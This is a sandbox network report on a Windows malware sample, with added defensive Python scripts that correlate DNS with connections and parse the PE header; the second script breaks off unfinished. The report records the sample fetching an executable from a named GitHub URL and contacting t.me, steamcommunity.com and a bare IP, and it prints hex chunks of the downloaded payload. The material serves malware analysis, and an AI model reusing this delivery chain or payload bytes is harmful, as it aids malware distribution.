Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                       CName  Address          Type            Class        DNS over HTTPS
Dec 23, 2024 08:52:12.144217968 CET  1.1.1.1    192.168.2.8  0xd59b    No error (0)  github.com                 -      20.233.83.145    A (IP address)  IN (0x0001)  false
Dec 23, 2024 08:52:14.788146019 CET  1.1.1.1    192.168.2.8  0x3ee9    No error (0)  raw.githubusercontent.com  -      185.199.110.133  A (IP address)  IN (0x0001)  false
Dec 23, 2024 08:52:14.788146019 CET  1.1.1.1    192.168.2.8  0x3ee9    No error (0)  raw.githubusercontent.com  -      185.199.108.133  A (IP address)  IN (0x0001)  false
Dec 23, 2024 08:52:14.788146019 CET  1.1.1.1    192.168.2.8  0x3ee9    No error (0)  raw.githubusercontent.com  -      185.199.109.133  A (IP address)  IN (0x0001)  false
Dec 23, 2024 08:52:14.788146019 CET  1.1.1.1    192.168.2.8  0x3ee9    No error (0)  raw.githubusercontent.com  -      185.199.111.133  A (IP address)  IN (0x0001)  false
Dec 23, 2024 08:52:18.448657036 CET  1.1.1.1    192.168.2.8  0x3a71    No error (0)  t.me                       -      149.154.167.99   A (IP address)  IN (0x0001)  false
Dec 23, 2024 08:52:20.570995092 CET  1.1.1.1    192.168.2.8  0xef5f    No error (0)  steamcommunity.com         -      104.102.49.254   A (IP address)  IN (0x0001)  false
                                                                                                                                                                                                                        • github.com
                                                                                                                                                                                                                        • raw.githubusercontent.com
                                                                                                                                                                                                                        • t.me
                                                                                                                                                                                                                        • steamcommunity.com
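The DNS answers, TCP packets and HTTP sessions in this report are the raw material for two checks an analyst runs on a capture like this: which queried name each contacted IP came from (and which IP was contacted with no lookup at all), and whether the download request looks like a browser's. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It embeds rows transcribed from the report's tables as constructed inline data (the tuple layout, the SANDBOX_IP constant and the +1h UTC-to-CET shift applied to the HTTP session timestamps are this example's own assumptions) and treats the HTTP/1.1 messages exactly as the report prints them. Run over these rows it shows that no DNS answer in the report resolves to 37.27.43.98, and that the GET for jtkhikadjthsad.exe carries no User-Agent header.

```python
"""Added example (not part of the Joe Sandbox report): correlate the report's
DNS answers with the sample's outbound TCP connections and audit the captured
HTTP request. All rows are transcribed from the report's tables and embedded
here (constructed inline) so the script runs offline; the layout is this
example's own."""
from collections import defaultdict
from urllib.parse import urlsplit

SANDBOX_IP = "192.168.2.8"  # the analysis VM, source of every outbound flow (assumed)

# (name, address) pairs from the "DNS Answers" table.
DNS_ANSWERS = [
    ("github.com", "20.233.83.145"),
    ("raw.githubusercontent.com", "185.199.110.133"),
    ("raw.githubusercontent.com", "185.199.108.133"),
    ("raw.githubusercontent.com", "185.199.109.133"),
    ("raw.githubusercontent.com", "185.199.111.133"),
    ("t.me", "149.154.167.99"),
    ("steamcommunity.com", "104.102.49.254"),
]

# One row per connection the sample opened: (first seen CET, src port, dst port,
# src ip, dst ip). The two GitHub rows come from the HTTP session headers, whose
# UTC timestamps are shifted +1h here to match the TCP table (an assumption).
TCP_FLOWS = [
    ("08:52:13", 49708, 443, SANDBOX_IP, "20.233.83.145"),
    ("08:52:16", 49709, 443, SANDBOX_IP, "185.199.110.133"),
    ("08:52:59", 49715, 443, SANDBOX_IP, "104.102.49.254"),
    ("08:52:59", 49716, 443, SANDBOX_IP, "37.27.43.98"),
    ("08:53:31", 49719, 443, SANDBOX_IP, "149.154.167.99"),
    ("08:53:33", 49720, 443, SANDBOX_IP, "104.102.49.254"),
    ("08:53:35", 49721, 443, SANDBOX_IP, "37.27.43.98"),
]

# Request and redirect of HTTP session 0, as printed in the report.
HTTP_REQUEST = ("GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1\r\n"
                "Host: github.com\r\nConnection: Keep-Alive\r\n\r\n")
HTTP_RESPONSE = ("HTTP/1.1 302 Found\r\nServer: GitHub.com\r\n"
                 "Content-Type: text/html; charset=utf-8\r\n"
                 "Location: https://raw.githubusercontent.com/olosha1/pockket/"
                 "refs/heads/main/jtkhikadjthsad.exe\r\n\r\n")


def resolve_map(answers):
    """Map each answered address back to the name that was queried for it."""
    ip_to_name = {}
    for name, addr in answers:
        ip_to_name.setdefault(addr, name)
    return ip_to_name


def summarize_connections(flows, ip_to_name, client_ip=SANDBOX_IP):
    """Group the client's outbound connections by destination; name is None
    when no DNS answer in the capture resolves to that IP."""
    by_dest = defaultdict(list)
    for first_seen, sport, dport, sip, dip in flows:
        if sip == client_ip:
            by_dest[dip].append((first_seen, dport))
    return {
        dip: {"name": ip_to_name.get(dip), "connections": len(conns),
              "first_seen": min(t for t, _ in conns),
              "dst_ports": sorted({p for _, p in conns})}
        for dip, conns in by_dest.items()}


def unresolved_destinations(summary):
    """Destinations reached by bare IP, i.e. endpoints the sample did not look up."""
    return sorted(ip for ip, s in summary.items() if s["name"] is None)


def parse_http_message(raw):
    """Split a raw HTTP/1.1 message into (start line, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    start, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")  # first colon only; URLs contain ':'
        headers[key.strip().lower()] = value.strip()
    return start, headers, body


def audit_http_request(raw):
    """Flag what a proxy or NDR rule keys on: no User-Agent, an .exe requested by path."""
    start, headers, _ = parse_http_message(raw)
    _, path, _ = start.split(" ", 2)
    findings = []
    if "user-agent" not in headers:
        findings.append("no User-Agent header")
    if path.lower().endswith(".exe"):
        findings.append("executable requested by path")
    return {"host": headers.get("host"), "path": path, "findings": findings}


def redirect_target(raw_response):
    """Return (status, host, path) of a redirect's Location, else (status, None, None)."""
    start, headers, _ = parse_http_message(raw_response)
    status = int(start.split(" ")[1])
    location = headers.get("location")
    if status in (301, 302, 303, 307, 308) and location:
        url = urlsplit(location)
        return status, url.hostname, url.path
    return status, None, None
```

Feeding `summarize_connections(TCP_FLOWS, resolve_map(DNS_ANSWERS))` to `unresolved_destinations` yields only 37.27.43.98; every other destination maps to one of the four queried names. `audit_http_request(HTTP_REQUEST)` reports both findings, and `redirect_target(HTTP_RESPONSE)` returns the raw.githubusercontent.com path that session 1 then fetches, which is how the 302 chain is followed across sessions in a log.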
Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.8  49708        20.233.83.145    443               4044  C:\Users\user\Desktop\YYjRtxS70h.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-23 07:52:13 UTC  114                OUT        GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1
Host: github.com
Connection: Keep-Alive
2024-12-23 07:52:14 UTC  565                IN         HTTP/1.1 302 Found
                                                                                                                                                                                                                        Server: GitHub.com
                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:52:14 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                        Access-Control-Allow-Origin:
                                                                                                                                                                                                                        Location: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        Referrer-Policy: no-referrer-when-downgrade
2024-12-23 07:52:14 UTC  3378               IN         Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
1           192.168.2.8  49709        185.199.110.133  443               4044  C:\Users\user\Desktop\YYjRtxS70h.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-23 07:52:16 UTC  125                OUT        GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-12-23 07:52:16 UTC  903                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Length: 476160
                                                                                                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                        ETag: "fab0c349a347a91ca7e8afd2bad974668e7a1ce50c0b2f5ed6f73ab561c31a75"
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                        X-GitHub-Request-Id: 983A:E76FB:25E89C2:2ABA5DA:676916B0
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:52:16 GMT
                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890088-NYC
                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                        X-Timer: S1734940336.276669,VS0,VE122
                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                        X-Fastly-Request-ID: f5f749722be5e3f6ae795b453236213167545510
                                                                                                                                                                                                                        Expires: Mon, 23 Dec 2024 07:57:16 GMT
                                                                                                                                                                                                                        Source-Age: 0
                                                                                                                                                                                                                        2024-12-23 07:52:16 UTC16384INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 95 8b 4d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a8 04 00 00 98 02 00 00 00 00 00 93 e8 03 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 28 00 00 04 00 00 00 00 00 00 02 00 00 82 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 a8 05 00 f0 00 00
                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELMg@(H
                                                                                                                                                                                                                        2024-12-23 07:52:16 UTC16384INData Raw: 00 89 81 52 e8 6c 8e a1 70 eb 45 00 8b 80 b2 e8 6c 8e 01 f0 b9 52 f4 6c 8e 03 0d 74 eb 45 00 51 68 3d b5 66 00 ff d0 83 c4 08 a1 38 ec 45 00 01 f8 8b 0d 3c ec 45 00 89 81 52 e8 6c 8e a1 70 eb 45 00 8b 80 b6 e8 6c 8e 01 f0 b9 8f f4 6c 8e 03 0d 74 eb 45 00 51 68 48 b5 66 00 ff d0 83 c4 08 a1 40 ec 45 00 01 f8 8b 0d 44 ec 45 00 89 81 52 e8 6c 8e a1 70 eb 45 00 8b 80 ba e8 6c 8e 01 f0 b9 d0 f4 6c 8e 03 0d 74 eb 45 00 51 68 54 b5 66 00 ff d0 83 c4 08 a1 48 ec 45 00 01 f8 8b 0d 4c ec 45 00 89 81 52 e8 6c 8e a1 70 eb 45 00 8b 80 be e8 6c 8e 01 f0 b9 08 f5 6c 8e 03 0d 74 eb 45 00 51 68 61 b5 66 00 ff d0 83 c4 08 a1 50 ec 45 00 01 f8 8b 0d 54 ec 45 00 89 81 52 e8 6c 8e a1 70 eb 45 00 8b 80 c2 e8 6c 8e 01 f0 b9 41 f5 6c 8e 03 0d 74 eb 45 00 51 68 6c b5 66 00 ff d0
                                                                                                                                                                                                                        Data Ascii: RlpElRltEQh=f8E<ERlpElltEQhHf@EDERlpElltEQhTfHELERlpElltEQhafPETERlpElAltEQhlf
                                                                                                                                                                                                                        2024-12-23 07:52:16 UTC16384INData Raw: 51 1b 88 50 04 0f b6 51 05 32 51 1c 88 50 05 0f b6 51 06 32 51 1d 88 50 06 0f b6 51 07 32 51 1e 88 50 07 0f b6 51 08 32 51 1f 88 50 08 0f b6 51 09 32 51 20 88 50 09 0f b6 51 0a 32 51 21 88 50 0a 0f b6 51 0b 32 51 22 88 50 0b 0f b6 51 0c 32 51 23 88 50 0c c6 05 06 b4 66 00 01 c3 cc cc cc 80 3d 10 b4 66 00 00 75 67 8b 4c 24 08 8b 44 24 04 0f b6 11 32 51 1e 88 10 0f b6 51 01 32 51 1f 88 50 01 0f b6 51 02 32 51 20 88 50 02 0f b6 51 03 32 51 21 88 50 03 0f b6 51 04 32 51 22 88 50 04 0f b6 51 05 32 51 23 88 50 05 0f b6 51 06 32 51 24 88 50 06 0f b6 51 07 32 51 25 88 50 07 0f b6 51 08 32 51 26 88 50 08 c6 05 10 b4 66 00 01 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 80 3d 1c b4 66 00 00 75 7b 8b 4c 24 08 8b 44 24 04 0f b6 11 32 51 1f 88 10 0f b6 51 01 32 51
                                                                                                                                                                                                                        Data Ascii: QPQ2QPQ2QPQ2QPQ2QPQ2Q PQ2Q!PQ2Q"PQ2Q#Pf=fugL$D$2QQ2QPQ2Q PQ2Q!PQ2Q"PQ2Q#PQ2Q$PQ2Q%PQ2Q&Pf=fu{L$D$2QQ2Q
                                                                                                                                                                                                                        2024-12-23 07:52:16 UTC16384INData Raw: 08 8b 44 24 04 0f b6 11 32 51 1c 88 10 0f b6 51 01 32 51 1d 88 50 01 0f b6 51 02 32 51 1e 88 50 02 0f b6 51 03 32 51 1f 88 50 03 0f b6 51 04 32 51 20 88 50 04 0f b6 51 05 32 51 21 88 50 05 0f b6 51 06 32 51 22 88 50 06 0f b6 51 07 32 51 23 88 50 07 0f b6 51 08 32 51 24 88 50 08 0f b6 51 09 32 51 25 88 50 09 0f b6 51 0a 32 51 26 88 50 0a 0f b6 51 0b 32 51 27 88 50 0b 0f b6 51 0c 32 51 28 88 50 0c 0f b6 51 0d 32 51 29 88 50 0d 0f b6 51 0e 32 51 2a 88 50 0e 0f b6 51 0f 32 51 2b 88 50 0f 0f b6 51 10 32 51 2c 88 50 10 c6 05 25 ba 66 00 01 c3 cc cc cc cc cc cc cc cc cc cc cc 80 3d 2f ba 66 00 00 75 67 8b 4c 24 08 8b 44 24 04 0f b6 11 32 51 11 88 10 0f b6 51 01 32 51 12 88 50 01 0f b6 51 02 32 51 13 88 50 02 0f b6 51 03 32 51 14 88 50 03 0f b6 51 04 32 51 15 88
                                                                                                                                                                                                                        Data Ascii: D$2QQ2QPQ2QPQ2QPQ2Q PQ2Q!PQ2Q"PQ2Q#PQ2Q$PQ2Q%PQ2Q&PQ2Q'PQ2Q(PQ2Q)PQ2Q*PQ2Q+PQ2Q,P%f=/fugL$D$2QQ2QPQ2QPQ2QPQ2Q
                                                                                                                                                                                                                        2024-12-23 07:52:16 UTC16384INData Raw: 09 32 51 1b 88 50 09 0f b6 51 0a 32 51 1c 88 50 0a 0f b6 51 0b 32 51 1d 88 50 0b 0f b6 51 0c 32 51 1e 88 50 0c 0f b6 51 0d 32 51 1f 88 50 0d c6 05 b3 c1 66 00 01 c3 cc cc cc cc cc cc cc cc cc 80 3d bc c1 66 00 00 75 5d 8b 4c 24 08 8b 44 24 04 0f b6 11 32 51 14 88 10 0f b6 51 01 32 51 15 88 50 01 0f b6 51 02 32 51 16 88 50 02 0f b6 51 03 32 51 17 88 50 03 0f b6 51 04 32 51 18 88 50 04 0f b6 51 05 32 51 19 88 50 05 0f b6 51 06 32 51 1a 88 50 06 0f b6 51 07 32 51 1b 88 50 07 c6 05 bc c1 66 00 01 c3 cc cc cc cc cc cc cc cc cc 80 3d d6 c1 66 00 00 75 54 55 53 57 56 8b 74 24 18 8b 7c 24 14 31 c9 bb e7 ff ff ff bd cd cc cc cc 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 89 c8 41 f7 e5 c1 ea 02 83 e2 fc 8d 04 92 8d 14 1e 29 c2 0f b6 42 19 32 44 1e 2d 88 44 1f 19
                                                                                                                                                                                                                        Data Ascii: 2QPQ2QPQ2QPQ2QPQ2QPf=fu]L$D$2QQ2QPQ2QPQ2QPQ2QPQ2QPQ2QPQ2QPf=fuTUSWVt$|$1f.DA)B2D-D
                                                                                                                                                                                                                        2024-12-23 07:52:17 UTC16384INData Raw: 45 00 0f 93 c2 03 b4 d5 78 9f 18 c3 43 ff e6 ba 67 66 66 66 89 c8 f7 ea 89 d0 c1 e8 1f c1 fa 02 01 c2 83 c1 09 31 c0 83 f9 13 0f 93 c0 be 93 f7 48 49 03 b4 c5 78 9f 18 c3 43 89 d1 ff e6 b9 cd cc cc cc 89 f8 f7 e1 89 d6 c6 43 01 00 c1 ee 03 8d 04 36 8d 04 80 89 fa 29 c2 8a 04 14 88 03 83 ff 0a bf 04 00 00 00 b8 10 00 00 00 0f 42 c7 8b 15 28 fa 45 00 bd 93 f7 48 49 8b 84 02 78 9f 18 c3 01 e8 4b ff e0 89 f0 b9 cd cc cc cc f7 e1 c1 ea 03 8d 04 12 8d 04 80 89 f1 29 c1 8a 04 0c 88 03 83 fe 0a b8 10 00 00 00 0f 42 c7 8b 0d 28 fa 45 00 8b 84 01 78 9f 18 c3 01 e8 4b 89 d6 ff e0 8b 44 24 24 83 c4 0c 5e 5f 5b 5d c2 08 00 b9 67 66 66 66 89 f8 f7 e9 89 d1 89 d0 c1 e8 1f c1 f9 02 01 c1 8d 47 09 31 d2 83 f8 13 0f 93 c2 03 b4 d5 78 9f 18 c3 4b 43 ff e6 cc cc cc cc cc cc
                                                                                                                                                                                                                        Data Ascii: ExCgfff1HIxCC6)B(EHIxK)B(ExKD$$^_[]gfffG1xKC
                                                                                                                                                                                                                        2024-12-23 07:52:17 UTC16384INData Raw: 15 04 fe 45 00 01 fa 89 d9 ff b0 c3 24 a2 ef 56 ff d2 a1 f8 fd 45 00 01 f8 89 d9 56 ff d0 a1 fc fd 45 00 01 f8 89 f1 ff d0 a1 24 fe 45 00 01 f8 b9 7c 2d a2 ef 03 0d c4 04 46 00 ba bc ca 66 00 51 52 ff d0 83 c4 08 a1 04 fe 45 00 01 f8 89 d9 ba bc ca 66 00 52 56 ff d0 a1 f8 fd 45 00 01 f8 89 d9 56 ff d0 a1 fc fd 45 00 01 f8 89 f1 ff d0 a1 04 fe 45 00 01 f8 89 d9 ba 6e ca 66 00 52 56 ff d0 a1 f8 fd 45 00 01 f8 89 d9 56 ff d0 a1 fc fd 45 00 01 f8 89 f1 ff d0 a1 f4 fd 45 00 01 f8 89 d9 8d 95 8c 00 00 00 52 56 ff d0 a1 f8 fd 45 00 01 f8 89 d9 56 ff d0 a1 fc fd 45 00 01 f8 89 f1 ff d0 a1 08 05 46 00 8b b0 c3 24 a2 ef a1 ec fd 45 00 01 f8 89 d9 ff d0 50 ff d6 89 45 f0 a1 08 05 46 00 8b b0 c3 24 a2 ef a1 ec fd 45 00 01 f8 8d 4d d8 ff d0 50 ff d6 89 c3 03 5d f0 a1
                                                                                                                                                                                                                        Data Ascii: E$VEVE$E|-FfQREfRVEVEEnfRVEVEERVEVEF$EPEF$EMP]
                                                                                                                                                                                                                        2024-12-23 07:52:17 UTC16384INData Raw: 00 83 c4 0c a1 cc 29 46 00 8b 80 b8 98 be 0e 89 45 e0 a1 54 11 46 00 01 f8 8d 5d 8c 6a 1c 53 ff d0 a1 58 11 46 00 01 f8 89 d9 ff d0 89 c6 a1 5c 11 46 00 01 f8 b9 e5 a3 be 0e 03 0d b4 29 46 00 ba 6b cc 67 00 51 52 ff d0 83 c4 08 a1 60 11 46 00 01 f8 56 b9 6b cc 67 00 51 8d 8d 88 fe ff ff 51 ff d0 50 8d 85 84 fd ff ff 50 ff 55 e0 a1 64 11 46 00 01 f8 89 d9 ff d0 0f 57 c0 0f 11 43 04 0f 11 43 34 0f 11 43 24 0f 11 43 14 c7 03 44 00 00 00 8d 85 80 fc ff ff 89 43 08 8d 75 d0 0f 11 06 a1 68 11 46 00 01 f8 8d 4d 08 ff 71 74 ff d0 a1 d4 29 46 00 83 ec 28 89 74 24 24 89 5c 24 20 31 c9 89 4c 24 1c 89 4c 24 18 0f 28 05 d0 54 45 00 0f 11 44 24 08 8d 95 84 fd ff ff 89 54 24 04 89 0c 24 31 f6 ff 90 b8 98 be 0e 85 c0 b8 0c 00 00 00 0f 45 c6 8b 0d c0 29 46 00 ba 47 56 31
                                                                                                                                                                                                                        Data Ascii: )FETF]jSXF\F)FkgQR`FVkgQQPPUdFWCC4C$CDCuhFMqt)F(t$$\$ 1L$L$(TED$T$$1E)FGV1
                                                                                                                                                                                                                        2024-12-23 07:52:17 UTC16384INData Raw: 2c 46 00 ba 19 7f 99 fa 01 d1 51 bf 4c cc 67 00 57 ff d0 83 c4 08 a1 80 2c 46 00 8b 80 da 74 99 fa 01 d8 8d 8d 88 00 00 00 57 8d 5d cc 53 ff d0 a1 80 2c 46 00 8b 80 d2 74 99 fa b9 2a 21 49 d1 01 c8 89 d9 8d 55 70 52 8d 5d a8 53 ff d0 a1 80 2c 46 00 8b 80 16 75 99 fa b9 2a 21 49 d1 01 c8 8b 0d 88 2c 46 00 ba ba 83 99 fa 01 d1 51 bf fd cc 67 00 57 ff d0 83 c4 08 a1 80 2c 46 00 8b 80 da 74 99 fa b9 2a 21 49 d1 01 c8 89 d9 57 ff 75 ec ff d0 8d 4e 04 a1 80 2c 46 00 8b 80 06 75 99 fa ba 2a 21 49 d1 01 d0 8d 55 08 52 ff d0 8d bd 38 ff ff ff 89 3e 8b 45 e8 89 46 78 8b 45 e4 89 46 7c a1 80 2c 46 00 8b 80 0a 75 99 fa b9 2a 21 49 d1 01 c8 ff d0 8b 65 f0 a1 80 2c 46 00 8b 80 e2 74 99 fa b9 2a 21 49 d1 01 c8 89 f9 ff d0 a1 80 2c 46 00 8b 80 e2 74 99 fa b9 2a 21 49 d1
                                                                                                                                                                                                                        Data Ascii: ,FQLgW,FtW]S,Ft*!IUpR]S,Fu*!I,FQgW,Ft*!IWuN,Fu*!IUR8>EFxEF|,Fu*!Ie,Ft*!I,Ft*!I
                                                                                                                                                                                                                        2024-12-23 07:52:17 UTC16384INData Raw: 8b 80 fc d0 c5 c2 01 f8 89 d9 ff d0 a1 84 2e 46 00 8b 80 fc d0 c5 c2 01 f8 8d 4d c0 ff d0 a1 98 2e 46 00 8b 0d 84 2e 46 00 03 b9 10 d1 c5 c2 8b b0 e8 d0 c5 c2 b8 ab e4 c5 c2 03 05 8c 2e 46 00 bb 17 ce 67 00 50 53 ff d7 83 c4 08 53 8d 85 70 fe ff ff 50 ff d6 8b 0d 80 2e 46 00 8d 51 28 8d 71 04 85 c0 0f 44 d6 b8 af 00 85 02 03 82 e8 d0 c5 c2 ff e0 a1 84 2e 46 00 bb 8b c4 3c 90 8b 80 e8 d0 c5 c2 01 d8 8d 7d cc 89 f9 68 0c a6 45 00 ff d0 a1 ac 2e 46 00 8b 0d 84 2e 46 00 8b 91 f4 d0 c5 c2 01 da 8d 75 a8 89 f9 ff b0 e8 d0 c5 c2 56 ff d2 8d 45 08 83 c0 18 8b 0d 84 2e 46 00 8b 91 ec d0 c5 c2 01 da 8d 7d 9c 89 f1 50 57 ff d2 a1 84 2e 46 00 8b 80 0c d1 c5 c2 01 d8 b9 03 db c5 c2 03 0d 8c 2e 46 00 51 be 49 cc 67 00 56 ff d0 83 c4 08 a1 84 2e 46 00 8b 80 f4 d0 c5 c2
                                                                                                                                                                                                                        Data Ascii: .FM.F.F.FgPSSpP.FQ(qD.F<}hE.F.FuVE.F}PW.F.FQIgV.F
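The first data chunk of session 1 starts with an MZ/PE header, so the 476160-byte download is a Windows executable, not the text GitHub's Content-Security-Policy header would suggest. As an added example that is not part of the Joe Sandbox report, the script below re-types the first 240 bytes of that chunk from the hex dump above and parses the DOS header, the COFF header and the fixed PE32 optional header, then cross-checks the result against the response's Content-Length. The byte values are the report's own; the field layout and flag constants are the standard PE format, and the checks are this example's triage logic, not sandbox output. The report's dump is cut off a few bytes later, inside the data directories, so the example stops at NumberOfRvaAndSizes.

```python
"""Parse the PE header bytes the sandbox captured for jtkhikadjthsad.exe (session 1).

Added example, not part of the Joe Sandbox report. The hex is copied from
the report's first 16384-byte data chunk; 16 bytes per row, offsets in comments.
"""
import struct
from datetime import datetime, timezone

PAYLOAD_HEAD_HEX = (
    "4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00"  # 0x00 'MZ', e_cblp, e_cp, e_crlc, e_cparhdr
    "00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"  # 0x10 e_lfarlc = 0x40
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"  # 0x20
    "00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00"  # 0x30 e_lfanew = 0x78
    "0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68"  # 0x40 DOS stub code, then its message
    "69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f"  # 0x50
    "74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20"  # 0x60
    "6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00"  # 0x70 'PE\0\0', Machine, NumberOfSections
    "95 8b 4d 67 00 00 00 00 00 00 00 00 e0 00 02 01"  # 0x80 TimeDateStamp .. Characteristics
    "0b 01 0e 00 00 a8 04 00 00 98 02 00 00 00 00 00"  # 0x90 PE32 magic, linker, section sizes
    "93 e8 03 00 00 10 00 00 00 00 00 00 00 00 40 00"  # 0xa0 EntryPoint, BaseOfCode, BaseOfData, ImageBase
    "00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00"  # 0xb0 alignments, OS and image versions
    "06 00 00 00 00 00 00 00 00 b0 28 00 00 04 00 00"  # 0xc0 subsystem version, SizeOfImage, SizeOfHeaders
    "00 00 00 00 02 00 00 82 00 00 10 00 00 10 00 00"  # 0xd0 CheckSum, Subsystem, DllCharacteristics, stack
    "00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00"  # 0xe0 heap, LoaderFlags, NumberOfRvaAndSizes
)
PAYLOAD_HEAD = bytes.fromhex(PAYLOAD_HEAD_HEX)

# Content-Length of the HTTP response that delivered the file (from the report).
REPORTED_CONTENT_LENGTH = 476160

CHAR_DLL = 0x2000                 # IMAGE_FILE_DLL
DLL_DYNAMIC_BASE = 0x0040         # ASLR opt-in
DLL_NX_COMPAT = 0x0100            # DEP opt-in

_COFF = "<HHIIIHH"                                               # 20 bytes
_OPT32 = "<HBB" + "I" * 9 + "H" * 6 + "IIII" + "HH" + "I" * 6    # 96 bytes, fixed part of PE32


def parse_pe32_header(data: bytes) -> dict:
    """Return the fields a triage analyst looks at first; raises on anything that is not PE32."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    machine, nsections, stamp, _symtab, _nsyms, _opt_size, chars = struct.unpack_from(_COFF, data, e_lfanew + 4)
    (magic, maj_link, min_link, size_of_code, _init, _uninit, entry, base_code, _base_data,
     image_base, _sect_align, file_align, _maj_os, _min_os, _maj_img, _min_img, _maj_sub, _min_sub,
     _win32ver, size_of_image, size_of_headers, _checksum, subsystem, dll_chars,
     _stk_res, _stk_com, _heap_res, _heap_com, _loader_flags, _n_dirs) = struct.unpack_from(_OPT32, data, e_lfanew + 24)
    if magic != 0x10B:
        raise ValueError("not a PE32 optional header")
    return {
        "machine": machine,                       # 0x014c = IMAGE_FILE_MACHINE_I386
        "sections": nsections,
        "timestamp": stamp,
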